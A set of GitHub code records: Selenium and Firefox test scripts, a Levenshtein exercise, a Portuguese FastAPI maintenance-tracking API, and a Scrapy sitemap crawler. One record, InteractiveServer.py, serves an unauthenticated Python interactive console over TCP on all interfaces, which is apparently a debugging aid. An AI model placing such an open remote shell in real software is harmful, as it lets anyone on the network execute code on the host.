install_requires=requirements,\n)\n","repo_name":"CS222-UIUC/course-project-group-13","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31761547580","text":"from time import sleep\nfrom poium import Page, Element, Elements\nfrom poium import Browser\nfrom selenium import webdriver\n\n# page层定义\nclass BaiduPage(Page):\n input = Element(id_=\"kw\", describe=\"搜索输入框\")\n button = Element(id_=\"su\", describe=\"搜索按钮\")\n results = Elements(xpath=\"//div/h3/a\", describe=\"搜索结果\")\n\n\ndr = webdriver.Chrome(r'D:\\Work\\QA\\selenium\\webdriver\\chromedriver.exe')\npage = BaiduPage(dr)\npage.get(\"https://www.baidu.com\")\npage.input.send_keys(\"baidu\")\npage.button.click()\nsleep(2)\n\nelem = page.results\nfor e in elem:\n print(e.text)\n\ndr.close()","repo_name":"King-Zeno/alw_selenium","sub_path":"demo1/testpoium.py","file_name":"testpoium.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29393621329","text":"def levenshtein(palab1, palab2):\n res=dict()\n for i in range(len(palab1) + 1):\n res[i]=dict()\n res[i][0]=i\n for i in range(len(palab2) + 1):\n res[0][i] = i\n for i in range(1, len(palab1) + 1):\n for j in range(1, len(palab2) + 1):\n res[i][j] = min(res[i][j-1] + 1, res[i-1][j] + 1, res[i-1][j-1] + (not palab1[i - 1] == palab2[j - 1]))\n\n a=[]\n a = res[len(palab1)][len(palab2)]\n if a==0:\n return \"0D\"\n if a>1:\n return \"+1\"\n\n if a==1:\n if len(palab1)==len(palab2):\n for i in palab1:\n if i not in palab2:\n return \"1S\"\n else:\n return \"IB\"\n\nif __name__ == \"__main__\":\n pal1=input(\"Ingrese palabra 1: \")\n pal2 = input(\"Ingrese palabra 1: \")\n print(levenshtein(pal1,pal2))","repo_name":"pabloschwarzenberg/grader","sub_path":"tema10_ej2/tema10_ej2_0c9c85fc2ebfcf19c19d03e86871a390.py","file_name":"tema10_ej2_0c9c85fc2ebfcf19c19d03e86871a390.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69991695610","text":"#! /usr/bin/python\n\nimport ff\n\nif __name__ == \"__main__\":\n (opt, args) = ff.parse_args()\n \n btn = [(50,170),\n (50,200),\n (50,230),\n (50,260)]\n\n # default\n if not opt.url:\n opt.url = \"../tests/button_test.html\"\n\n win = ff.launch(opt.profile, opt.url)\n \n c = ff.cmd()\n for (x,y) in btn:\n c.click(x,y)\n c.execute(win)\n\n win.close()\n ff.done()","repo_name":"haowu4682/repair","sub_path":"code/undosys/firefox/auto/test_btn.py","file_name":"test_btn.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17116512393","text":"import json\r\nfrom typing import List\r\nfrom uuid import uuid4\r\nfrom fastapi import FastAPI, Request\r\nfrom pydantic import BaseModel\r\nfrom datetime import datetime\r\n\r\napp = FastAPI() # Variável que contém o aplicativo\r\n\r\n# Observações:\r\n# 1) Em python, há um padrão de organização onde todas as classes devem ter nome com primeira letra maiúscula.\r\n# 2) Os nomes das variáveis costumam ser separados pelo caracter underline ( \"_\" ).\r\n# 3) Os nomes das rotas são os mesmos nomes dos métodos para facilitar a interpretação do código e da API.\r\n# 4) Variáveis contendo prefixo \"arm\" são usadas para armazenar os dados\r\n\r\n\r\nclass Manutencao(BaseModel): # Estrutura dos dados da manutenção\r\n\r\n id_manutencao: str\r\n\r\n data_hora_inicio_manutencao: str = None\r\n data_hora_fim_manutencao: str = None \r\n data_hora_chegada_veiculo: str = None\r\n\r\n data_hora_criacao_registro: str = None\r\n\r\n nome_mecanico: str\r\n nome_cliente: str\r\n \r\n veiculo: dict\r\n \r\n problema: str\r\n\r\n if data_hora_fim_manutencao == None and data_hora_inicio_manutencao == None: # Se inicio e fim forem igual a \"None\", o status recebe \"Pendente\"\r\n __variavel_status = 'Pendente'\r\n\r\n elif data_hora_fim_manutencao != None: # Se a variável dh_fim_manutencao for diferente de None, status recebe \"Concluído\"\r\n __variavel_status = 'Concluído'\r\n\r\n elif data_hora_inicio_manutencao != None: # Se a variável dh_inicio_manutencao for diferente de \"None\", status recebe \"Em progresso\"\r\n __variavel_status = 'Em progresso'\r\n \r\n # Variável definida automaticamente\r\n status: str = __variavel_status # Varia entre \"Em aberto\", \"Em progresso\", \"Concluído\"\r\n \r\n\r\ndef atualizacao_status(registro: Manutencao):\r\n\r\n '''\r\n Função para atualizar os status dos registros após eventuais atualizações de registros.\r\n\r\n parâmetros:\r\n\r\n registro : Variável do tipo Manutencao que recebe o registro que precisa ser atualizado.\r\n '''\r\n\r\n if registro.data_hora_fim_manutencao == None and registro.data_hora_inicio_manutencao == None: # Se inicio e fim forem igual a \"None\", o status recebe \"Pendente\"\r\n registro.status = 'Pendente'\r\n\r\n elif registro.data_hora_fim_manutencao != None: # Se a variável dh_fim_manutencao for diferente de None, status recebe \"Concluído\"\r\n registro.status = 'Concluído'\r\n\r\n elif registro.data_hora_inicio_manutencao != None: # Se a variável dh_inicio_manutencao for diferente de \"None\", status recebe \"Em progresso\"\r\n registro.status = 'Em progresso'\r\n\r\ndef atualizacao_arm_veiculos_manutencao(arm_veiculos_manutencao: List[dict], lista_manutencoes: List[Manutencao]):\r\n\r\n '''\r\n Função para atualizar lista de veículos em manutenção.\r\n\r\n parâmetros:\r\n\r\n arm_veiculos_manutencao : Lista de veículos em manutenção que será atualizada.\r\n lista_manutencoes : Lista usada para fazer a atualização.\r\n '''\r\n\r\n veiculos_manutencoes_em_progresso = []\r\n for registro in lista_manutencoes: # Para cada registro em lista manutencoes\r\n\r\n if registro.status == 'Em progresso': # Se o status do registro for igual a \"Em progresso\"\r\n \r\n veiculos_manutencoes_em_progresso.append(registro.veiculo) # Adicionar veículo do registro à lista de manutenções em progresso\r\n print(registro.veiculo, registro.status, '\\n', veiculos_manutencoes_em_progresso)\r\n\r\n arm_veiculos_manutencao[:] = veiculos_manutencoes_em_progresso[:] # Retorna lista de veículos em manutenção em progresso\r\n\r\n\r\n# Padrão de organização: variáveis contendo prefixo \"arm\" são usadas para armazenar os dados\r\narm_manutencoes: List[Manutencao] = [] # Lista que armazenará objetos do tipo \"Manutencao\" e inicializando lista vazia\r\narm_veiculos_em_manutencao: List[dict] = [] # Lista que armazenará objetos do tipo \"Veiculo\" e inicializando lista vazia\r\n\r\n\r\n# Métodos GET\r\n# /get_manutencao : Obtém os registros de manutenções agendadas.\r\n# /get_veiculos_em_manutencao : Obtém os veículos onde o status da manutenção é \"Em progresso\"\r\n\r\n@app.get('/') # Diretório root (home)\r\ndef home():\r\n return {'message': 'Executado com sucesso. Insira uma rota.'}\r\n\r\n\r\n@app.get('/get_manutencao')\r\ndef get_manutencao(request: Request):\r\n return arm_manutencoes\r\n\r\n@app.get('/get_veiculos_em_manutencao')\r\ndef get_veiculos_em_manutencao():\r\n return arm_veiculos_em_manutencao\r\n\r\n\r\n# Métodos POST (Inserção de dados)\r\n# /create_manutencao : Cria um registro de manutenção\r\n# /create_veiculo : Cria um registro contendo dados do veículo (placa, cliente (proprietário), etc)\r\n\r\n@app.post('/create_manutencao')\r\nasync def create_manutencao(request: Request):\r\n\r\n body = json.loads( await request.body() )\r\n\r\n manutencao = Manutencao(\r\n \r\n id_manutencao = str(uuid4()),\r\n\r\n data_hora_criacao_registro = datetime.today().strftime( '%d/%m/%Y %H:%M:%S' ),\r\n\r\n nome_mecanico = body['nome_mecanico'],\r\n nome_cliente = body['nome_cliente'],\r\n \r\n problema = body['problema'],\r\n\r\n veiculo = {\r\n \"nome\": body['nome_veiculo'],\r\n \"placa\": body['placa_veiculo']\r\n }\r\n )\r\n\r\n arm_manutencoes.append( manutencao )\r\n\r\n return {'message': 'Operação executada com sucesso.', 'id_manutencao_criada': manutencao.id_manutencao}\r\n\r\n\r\n# Métodos PUT\r\n# /update_dh_inicio_manutencao : Atualiza a data e hora de início da manutenção \r\n# /update_dh_fim_manutencao : Atualiza a data e hora do fim da manutenção\r\n# /update_dh_chegada_veiculo : Atualiza a data e hora da chegada do veículo\r\n\r\n@app.put('/update_inicio_manutencao')\r\nasync def update_inicio_manutencao(request: Request):\r\n\r\n body = json.loads( await request.body() )\r\n\r\n for registro in arm_manutencoes: # Para cada registro na lista arm_manutencoes\r\n\r\n if registro.id_manutencao == body['id_manutencao']: # Se o id_manutencao for igual ao id da requisição\r\n \r\n registro.data_hora_inicio_manutencao = body['data_hora_inicio_manutencao'] # Atualizar o horário do registro\r\n\r\n atualizacao_status( registro ) # Atualizando o status do registro\r\n\r\n atualizacao_arm_veiculos_manutencao( arm_veiculos_em_manutencao, arm_manutencoes ) # Atualizando veiculos em manutenção\r\n\r\n return {'message': 'Operação executada com sucesso.'} # Retornando que a operação foi executada com sucesso\r\n \r\n return {'message': 'ID não encontrado.'} # Se o ID não for encontrado, retornar \"ID não encontrado.\"\r\n\r\n \r\n\r\n\r\n@app.put('/update_fim_manutencao')\r\nasync def update_fim_manutencao(request: Request):\r\n\r\n body = json.loads( await request.body() )\r\n\r\n for registro in arm_manutencoes: # Para cada registro na lista arm_manutencoes\r\n\r\n if registro.id_manutencao == body['id_manutencao']: # Se o id do registro for igual ao id da requisição\r\n\r\n registro.data_hora_fim_manutencao = body['data_hora_fim_manutencao'] # Atualizar o horário do registro\r\n\r\n atualizacao_status( registro ) # Atualizando o status do registro\r\n\r\n atualizacao_arm_veiculos_manutencao( arm_veiculos_em_manutencao, arm_manutencoes ) # Atualizando veiculos em manutenção\r\n \r\n return {'message': 'Operação executada com sucesso.'} # Retornando que a operação foi executada com sucesso\r\n \r\n return {'message': 'ID não encontrado.'} # Se o ID não for encontrado, retornar \"ID não encontrado.\"\r\n \r\n\r\n@app.put('/update_chegada_veiculo')\r\nasync def update_dh_chegada_veiculo(request: Request):\r\n\r\n body = json.loads( await request.body() )\r\n\r\n for registro in arm_manutencoes: # Para cada registro na lista arm_manutencoes\r\n\r\n if registro.id_manutencao == body['id_manutencao']: # Se o id do registro for igual ao id da requisição\r\n\r\n registro.data_hora_chegada_veiculo = body['data_hora_chegada_veiculo'] # Atualizar o horário do registro\r\n\r\n atualizacao_status( registro ) # Atualizando o status do registro\r\n\r\n return {'message': 'Operação executada com sucesso.'} # Retornando que a operação foi executada com sucesso\r\n \r\n return {'message': 'ID não encontrado.'} # Se o id não for encontrado, retornar \"ID não encontrado.\"\r\n \r\n\r\n# Métodos DELETE\r\n# /delete_manutencao : Deleta um registro de manutenção.\r\n\r\n@app.delete('/delete_manutencao')\r\nasync def delete_manutencao(request: Request):\r\n\r\n body = json.loads( await request.body() )\r\n\r\n for registro in arm_manutencoes: # Para cada registro na lista arm_manutencoes\r\n \r\n if registro.id_manutencao == body['id_manutencao']: # Se o id do registro for igual ao id da requisição\r\n \r\n if registro.status not in 'Concluído': # Se o status não for \"Concluído\"\r\n\r\n arm_manutencoes.remove( registro ) # Então remover o registro da lista arm_manutencoes\r\n\r\n atualizacao_arm_veiculos_manutencao(arm_veiculos_em_manutencao, arm_manutencoes) # Atualizando veiculos em manutenção\r\n\r\n return {'message': 'Operação executada com sucesso.'} # Retornando que a operação foi executada\r\n \r\n # Se o status for \"Concluído\", retornar que não foi possível executar operação\r\n return {'message': f'Operação não pôde ser executada. Status da manutenção: {registro.status}'}\r\n \r\n return {'message': 'ID não encontrado.'} # Se o ID não for encontrado, retornar \"ID não encontrado.\"","repo_name":"guilhermyandrade/Desenvolvimento-WEB","sub_path":"Atividade 1 - 2B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9622,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33677717903","text":"import sys\nfrom six.moves import socketserver\nfrom code import InteractiveConsole\n\ninterpreter_globals = {}\n\n\nclass InteractiveServer(socketserver.BaseRequestHandler):\n def handle(self):\n global interpreter_globals\n\n file = self.request.makefile()\n shell = Shell(file, locals=interpreter_globals)\n try:\n shell.interact()\n except SystemExit:\n pass\n\n\nclass Shell(InteractiveConsole):\n def __init__(self, file, *args, **kwargs):\n self.file = sys.stdout = file\n InteractiveConsole.__init__(self, *args, **kwargs)\n return\n\n def write(self, data):\n self.file.write(data)\n self.file.flush()\n\n def raw_input(self, prompt=\"\"):\n self.write(prompt)\n return self.file.readline()\n\n\ndef interact(address=(\"0.0.0.0\", 9999)):\n server = socketserver.TCPServer(address, InteractiveServer)\n server.serve_forever()\n\n\nport = 9999\nif __name__ == '__main__': # pragma: no cover\n if len(sys.argv) > 1:\n port = int(sys.argv[1])\n interact((\"0.0.0.0\", port))\n","repo_name":"bbc/nmos-common","sub_path":"nmoscommon/InteractiveServer.py","file_name":"InteractiveServer.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"20656643893","text":"from models import URL\n\nfrom categorizer import Categorizer\nfrom finalizer import finalizer\nfrom formatter import formatter\nfrom tokenizer import Tokenizer\n\n\nfrom mongoengine import connect\nimport re\nfrom multiprocessing import Process, Queue\nimport scrapy.crawler as crawler\nimport uuid\nfrom scrapy import signals\nimport shutil\nfrom scrapy.utils.gz import gunzip, gzip_magic_number\nfrom scrapy.utils.sitemap import Sitemap, sitemap_urls_from_robots\nfrom scrapy.http import Request, XmlResponse\nfrom scrapy.spiders import Spider\nfrom bson.objectid import ObjectId\nfrom langdetect import detect\nimport xml.etree.ElementTree as ET\nfrom urllib.parse import urljoin\nfrom urllib.parse import urlparse\nimport pickle\nimport pprint\nimport os\nimport base64\nimport scrapy\nimport simplejson as json\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.utils.project import get_project_settings\nfrom scrapy.selector import Selector\nfrom twisted.internet import reactor\nfrom scrapy.crawler import CrawlerRunner\nfrom scrapy.utils.log import configure_logging\n\nerror_urls = []\n\n#from janome.tokenizer import Tokenizer\ntry:\n import nltk.data\nexcept:\n import imp\n import sys\n sys.modules[\"sqlite\"] = imp.new_module(\"sqlite\")\n sys.modules[\"sqlite3.dbapi2\"] = imp.new_module(\"sqlite.dbapi2\")\n import nltk\n\n import nltk.data\n\n\ndef output_pickle(dic, filename):\n output = open(filename + '.pkl', 'w')\n pickle.dump(dic, output)\n output.close()\n\n\ndef pp(obj):\n pp = pprint.PrettyPrinter(indent=4, width=160)\n str = pp.pformat(obj)\n return re.sub(r\"\\\\u([0-9a-f]{4})\", lambda x: unichr(int(\"0x\"+x.group(1), 16)), str)\n\n\ndef load_pickle(filename):\n pkl_file = open(\"Supplements.pkl\")\n data1 = pickle.load(pkl_file)\n print(pp(data1))\n pkl_file.close()\n\n\nregex = re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n # domain...\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|'\n r'localhost|' # localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n\n\nclass Spider(scrapy.spiders.SitemapSpider):\n name = 'items'\n custom_settings = {\n 'BOT_NAME': 'stand-alone',\n 'HTTPERROR_ALLOWED_CODES': 'True',\n 'DEFAULT_REQUEST_HEADERS': {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'jp',\n 'User-Agents': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',\n #'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0'\n },\n #'USER_AGENT':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',\n #'USER_AGENT':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',\n #'REDIRECT_ENABLED':'False',\n 'scrapy.telnet.TelnetConsole': None,\n 'CONCURRENT_ITEMS': os.getenv('SCRAPY_CONCURRENT_ITEMS', '1000'),\n 'CONCURRENT_REQUESTS': os.getenv('SCRAPY_CONCURRENT_REQUESTS', '1000'),\n 'DOWNLOAD_DELAY': float(os.getenv('SCRAPY_DOWNLOAD_DELAY', 0.1)),\n 'DOWNLOAD_MAXSIZE': 1024 * 128 * 64\n #'CONCURRENT_REQUESTS_PER_DOMAIN': 30,\n #'CONCURRENT_REQUESTS_PER_IP': 10\n #'ROBOTSTXT_OBEY': True,\n #'SPIDER_MIDDLEWARES': {\n # 'scrapy.downloadermiddlewares.robotstxt.RobotsTxtMiddleware': 543\n #}\n\n }\n\n allowed_domains = []\n\n @classmethod\n def from_crawler(cls, crawler, *args, **kwargs):\n spider = super(Spider, cls).from_crawler(crawler, *args, **kwargs)\n crawler.signals.connect(spider._handle_error,\n signal=signals.spider_error)\n\n return spider\n\n def _handle_error(self, failure, response, spider):\n self.logger.error(\"### HANDLE_ERROR ###\")\n self.logger.error(failure.type)\n self.logger.error(failure.getErrorMessage())\n\n def __init__(self, *args, **kwargs):\n super(Spider, self).__init__(*args, **kwargs)\n config = kwargs.get('config')\n self.config = config\n self.kwargs = kwargs.get('kwargs')\n\n self.entry_url = kwargs.get('entry_url')\n self.document_xpath = kwargs.get('document_xpath')\n self.image_xpath = kwargs.get('image_xpath')\n self.allow_rule = kwargs.get('allow_rule')\n self.deny_rule = kwargs.get('deny_rule')\n self.page_limit = kwargs.get('page_limit')\n self.request_id = kwargs.get('request_id')\n self.job_id = kwargs.get('job_id')\n self.exclude_reg = kwargs.get('exclude_reg')\n\n self.URL = URL\n\n self.logger.info('document_xpath=%s', self.document_xpath)\n self.logger.info('image_xpath=%s', self.image_xpath)\n self.logger.info('allow_rule=%s', self.allow_rule)\n self.logger.info('deny_rule=%s', self.deny_rule)\n self.logger.info('page_limit=%s', self.page_limit)\n self.logger.info('request_id=%s', self.request_id)\n self.logger.info('exclude_reg=%s', self.exclude_reg)\n\n if self.entry_url is not None:\n if re.match(regex, self.entry_url) is not None:\n domain = urlparse(self.entry_url).netloc\n self.allowed_domains.append(domain)\n else:\n raise Exception\n else:\n raise Exception\n\n self.stored_sitemap = {}\n\n if not os.path.exists('workspace'):\n os.mkdir('workspace')\n if not os.path.exists('workspace/temp'):\n os.mkdir('workspace/temp')\n\n if os.path.isfile('./workspace/temp/store.json'):\n with open('./workspace/temp/store.json', \"r\") as f:\n self.stored_sitemap = json.loads(f.read())\n\n self.enable_page_limit = False\n if self.page_limit >= 0:\n self.enable_page_limit = True\n self.max_requests = self.page_limit\n elif self.page_limit == -1:\n pass\n else:\n raise Exception\n\n self.request_counter = 0\n self.tokenizer = Tokenizer(exclude_reg=self.exclude_reg)\n\n def start_requests(self):\n yield Request(self.entry_url, self._parse_root)\n\n def _errback(self, response):\n url = response.request.url\n if url.endswith('/robots.txt') or url.endswith('/robots.txt/'):\n url = urlparse(url).scheme + \"://\" + \\\n urlparse(url).netloc + \"/sitemap.xml\"\n yield Request(url, self._parse_root, errback=self._errback)\n elif url.endswith('/sitemap.xml'):\n url = urlparse(url).scheme + \"://\" + urlparse(url).netloc\n yield Request(url, self._parse_page, dont_filter=True)\n\n def _parse_root(self, response):\n\n url = response.request.url\n base_url = urlparse(url).scheme + \"://\" + urlparse(url).netloc\n\n if url.endswith('/robots.txt') or url.endswith('/robots.txt/'):\n if \"Sitemap:\" in str(response.body):\n yield Request(url, self._parse_sitemap, dont_filter=True)\n else:\n yield Request(base_url, self._parse_page, dont_filter=True)\n elif url.endswith('/sitemap.xml') or url.endswith('/sitemap') or url.endswith('/sitemap/'):\n yield Request(url, self._parse_sitemap, dont_filter=True)\n else:\n expect_url = base_url + \"/robots.txt\"\n yield Request(expect_url, self._parse_root, errback=self._errback)\n\n def _get_sitemap_body(self, response):\n \"\"\"Return the sitemap body contained in the given response,\n or None if the response is not a sitemap.\n \"\"\"\n if isinstance(response, XmlResponse):\n return response.body\n elif gzip_magic_number(response):\n return gunzip(response.body)\n\n elif response.url.endswith('.xml') or response.url.endswith('.xml.gz'):\n return response.body\n\n try:\n root = ET.fromstring(response.body)\n return response.body\n except:\n pass\n\n def _check_lastmod(self, d):\n\n if not d[\"loc\"] in self.stored_sitemap:\n return True\n\n if not \"lastmod\" in self.stored_sitemap[d[\"loc\"]]:\n return True\n\n return False\n\n def _iterloc(self, it, alt=False):\n for d in it:\n if not \"loc\" in d:\n yield\n elif not \"lastmod\" in d:\n yield d['loc'], None\n elif self._check_lastmod(d):\n yield d['loc'], d[\"lastmod\"]\n\n if alt and 'alternate' in d:\n for l in d['alternate']:\n yield l, None\n\n scaned_dict = []\n\n def _parse_page(self, response):\n sel = Selector(response)\n links = sel.xpath('//a/@href').extract()\n parsed = urlparse(response.request.url)\n\n for link in links:\n\n if link.startswith(\"//\"):\n link = parsed.scheme + \"://\" + parsed.netloc + link[1:]\n elif link.startswith(\"/\"):\n link = parsed.scheme + \"://\" + parsed.netloc + link\n elif not parsed.netloc == urlparse(link).netloc:\n self.logger.info('###OUTDOMAIN_URL=%s', (link))\n continue\n\n if link in self.scaned_dict:\n continue\n\n for r, c in self._cbs:\n if self.enable_page_limit and self.request_counter >= self.max_requests:\n return\n if not self._filter(link):\n self.request_counter += 0.2\n break\n self.request_counter += 1\n request = Request(link, callback=c)\n request.meta['lastmod'] = None\n self.scaned_dict.append(response.request.url)\n yield request\n break\n\n def _parse_sitemap(self, response):\n\n if response.url.endswith('/robots.txt'):\n\n for url in sitemap_urls_from_robots(response.text, base_url=response.url):\n yield Request(url, callback=self._parse_sitemap)\n\n else:\n body = self._get_sitemap_body(response)\n if body is None:\n return\n\n s = Sitemap(body)\n it = self.sitemap_filter(s)\n\n if s.type == 'sitemapindex':\n for loc, lastmod in self._iterloc(it, self.sitemap_alternate_links):\n if any(x.search(loc) for x in self._follow):\n request = Request(loc, callback=self._parse_sitemap)\n request.meta['lastmod'] = lastmod\n yield request\n elif s.type == 'urlset':\n for loc, lastmod in self._iterloc(it, self.sitemap_alternate_links):\n for r, c in self._cbs:\n if r.search(loc):\n if self.enable_page_limit and self.request_counter >= self.max_requests:\n return\n if not self._filter(loc):\n self.request_counter += 0.2\n break\n self.request_counter += 1\n request = Request(loc, callback=c)\n request.meta['lastmod'] = lastmod\n yield request\n break\n\n def _filter(self, url):\n domain = urlparse(url).netloc\n if not domain in self.allowed_domains:\n return False\n\n if self.allow_rule:\n if not re.search(self.allow_rule, url):\n self.logger.info('DENY=%s', url)\n return False\n\n if self.deny_rule:\n if re.search(self.deny_rule, url):\n self.logger.info('DENY=%s', url)\n return False\n self.logger.info('ALLOW=%s', url)\n\n return True\n\n def closed(self, reason):\n\n #self.logger.info('REASON=%s',reason)\n\n scraped = self.URL.objects.filter(requestId=self.request_id)\n\n store = {}\n for url in scraped:\n if len(url.words) > 0:\n store[url.url] = {}\n if hasattr(scraped, \"lastmod\"):\n store[url.url][\"lastmod\"] = scraped.lastmod\n\n json_store = json.dumps(store, indent=4, sort_keys=True)\n with open('./workspace/temp/store.json', \"w\") as f:\n f.write(json_store)\n\n passage_dir = \"./passages\"\n if os.path.exists(passage_dir):\n shutil.rmtree(passage_dir)\n os.mkdir(passage_dir)\n else:\n os.mkdir(passage_dir)\n\n input_metas = []\n separated_docs = []\n for url in scraped:\n if len(url.words) > 0:\n separated_docs.append(list(url.words))\n\n meta = {}\n meta[\"url\"] = url.url\n meta[\"title\"] = url.title\n meta[\"passage\"] = url.passage\n meta[\"user_meta\"] = url.user_meta\n if len(url.imageUrls) != 0:\n meta[\"img_url\"] = list(url.imageUrls)[0]\n else:\n meta[\"img_url\"] = \"\"\n\n if not os.path.exists('./passages/'+self.request_id):\n os.mkdir('./passages/'+self.request_id)\n\n stream = url.passage\n stream = \"\\n\" + stream\n stream = stream.encode(\"utf-8\")\n\n passage_file_name = base64.b64encode(\n bytes(url.url.encode(\"utf-8\"))).decode(\"ascii\")\n with open('./passages/{0}/{1}.txt'.format(self.request_id, passage_file_name), mode='wb') as f:\n f.write(stream)\n\n input_metas.append(meta)\n\n json_scraped = scraped.to_json(indent=4, sort_keys=True)\n with open('./workspace/temp/scraped.json', \"w\") as f:\n f.write(json_scraped)\n\n sitemap_url = self.entry_url\n request_id = self.request_id\n\n res = self._create_model(separated_docs, input_metas)\n\n if not os.path.exists('result'):\n os.mkdir('result')\n\n res = finalizer(res)\n\n resj = json.dumps(res, indent=4, sort_keys=True)\n with open('./result/res.json', \"w\") as f:\n f.write(resj)\n\n self.scraped_length = len(scraped)\n self._export(resj)\n\n def _export_error(self):\n return\n\n def _export(self, resj):\n return\n\n def _create_model(self, separated_docs, input_metas):\n cat = Categorizer(separated_docs, input_metas,\n self.entry_url, self.request_id, mode=\"eco\")\n res, all_topics, metas = cat.train(num_topics=len(\n separated_docs), filter_n_most_frequent=0, auto=False)\n\n return res\n\n def _get_image(self, sels, response, allow_outer_domain=False):\n\n image_urls = []\n for img in sels:\n image_url = img.xpath(\"@src\").extract_first()\n data_lazy_src = img.xpath(\"@data-lazy-src\").extract_first()\n if data_lazy_src is not None:\n image_url = data_lazy_src\n\n img_width = img.xpath(\"@width\").extract_first()\n img_height = img.xpath(\"@height\").extract_first()\n\n image = {}\n\n if image_url is not None and len(image_url) > 1:\n image[\"url\"] = urljoin(response.request.url, image_url)\n else:\n continue\n\n if \"base64,\" in image[\"url\"]:\n continue\n\n if img_width is None:\n img_width = 150\n if img_height is None:\n img_height = 150\n\n try:\n image[\"width\"] = float(img_width)\n except:\n image[\"width\"] = 0.1\n try:\n image[\"height\"] = float(img_height)\n except:\n image[\"height\"] = 0.1\n try:\n image[\"src\"] = image_url\n except:\n image[\"src\"] = \"\"\n\n image_urls.append(image)\n\n if len(image_urls) == 0:\n self.logger.info('empty0')\n return image_urls\n\n image_urls = list(filter(\n lambda p: p[\"width\"]/p[\"height\"] > 0.1 and p[\"height\"]/p[\"width\"] > 0.1, image_urls))\n\n if image_urls is None:\n self.logger.info('empty1')\n return []\n\n if not allow_outer_domain:\n image_urls = list(filter(lambda p: urlparse(p[\"url\"]).netloc == urlparse(\n response.request.url).netloc, image_urls))\n\n if image_urls is None:\n self.logger.info('empty2')\n return []\n\n if not list(image_urls):\n self.logger.info('empty3')\n return []\n\n max_one = max(image_urls, key=lambda p: p[\"width\"])\n image_urls = [max_one[\"url\"], ]\n return image_urls\n\n def parse(self, response):\n\n url = response.request.url\n\n domain = urlparse(url).netloc\n if not domain in self.allowed_domains:\n return\n\n lastmod = response.request.meta[\"lastmod\"]\n\n sel = Selector(response)\n\n title = sel.xpath('//title/text()').extract_first()\n\n if self.image_xpath is not None:\n image_urls = self._get_image(\n sel.xpath(self.image_xpath), response, allow_outer_domain=True)\n else:\n image_urls = self._get_image(\n sel.xpath(\"//article//img\"), response, allow_outer_domain=True)\n\n if len(image_urls) == 0:\n image_urls = self._get_image(\n sel.xpath(\"//img\"), response, allow_outer_domain=True)\n\n user_meta = {}\n\n obj = formatter(sel)\n #obj = dict()\n #exec(self.json_format, {\"sel\": sel,\n # \"re\": re, \"logger\": self.logger}, obj)\n user_meta = obj # [\"res\"]\n\n title = (title.replace('\\n', ''))\n passage = title + \"\\n\"\n if self.document_xpath is not None:\n passageXPath = self.document_xpath\n else:\n passageXPath = \"//*[self::h1 or self::h2 or self::h3 or self::h4 or self::h5 or self::h6]/text()|//article//div/text()|//article//p/text()\"\n passage_word_list = sel.xpath(passageXPath).extract()\n\n regex = r\".+\"\n for p in passage_word_list:\n pp = (p.replace('\\n', ''))\n pp = (pp.replace(' ', ''))\n passage += \" \" + pp\n\n lang = detect(passage)\n\n if lang == 'ja':\n words = self.molph_mecab(passage)\n else:\n words = self.molph_nltk(passage)\n\n json_words = json.dumps(words)\n\n if True:\n if len(words) > 0:\n objectId = ObjectId()\n molphed = self.URL(url=url)\n molphed.title = title # one\n molphed.lang = lang\n molphed.words = words\n molphed.words_len = len(words)\n molphed.imageUrls = image_urls\n molphed.passage = passage\n molphed.user_meta = user_meta\n\n molphed.lastmod = lastmod\n molphed.requestId = self.request_id\n molphed.save()\n\n return\n\n def molph_mecab(self, line):\n return self.tokenizer.tokenize(line)\n\n def molph_nltk(self, line):\n words = []\n #print(line)\n tokens = nltk.word_tokenize(line)\n taggeds = nltk.pos_tag(tokens)\n for tagged in taggeds:\n #print(tagged)\n w = str(tagged[1])\n if (w == 'NN' or w == 'NNS' or w == 'NNP' or w == 'NNPS') and len(tagged[0]) > 1:\n a = tagged[0]\n words.append(a.lower()) # Lowercase only\n #if re.search('NN', w):\n # a = tagged[0]\n # words.append(a)\n return words\n\n\n#from scrapy.xlib.pydispatch import dispatcher\n\n\nclass ScannerWrapper():\n def __init__(self, entry_url, document_xpath=None, image_xpath=None, allow_rule=None, deny_rule=None, page_limit=1000, exclude_reg=r\"\\d(年|月|日|時|分|秒)\"):\n\n self.entry_url = entry_url\n self.document_xpath = document_xpath\n self.image_xpath = image_xpath\n self.allow_rule = allow_rule\n self.deny_rule = deny_rule\n self.page_limit = page_limit\n self.exclude_reg = exclude_reg\n\n MONGO_ADDR = \"localhost\"\n MONGO_PORT = 27017\n MONGO_DB = \"test\"\n connect(MONGO_DB, host=MONGO_ADDR, port=MONGO_PORT)\n\n self.request_id = str(uuid.uuid4())\n self.job_id = str(uuid.uuid4())\n\n def main(self):\n\n return 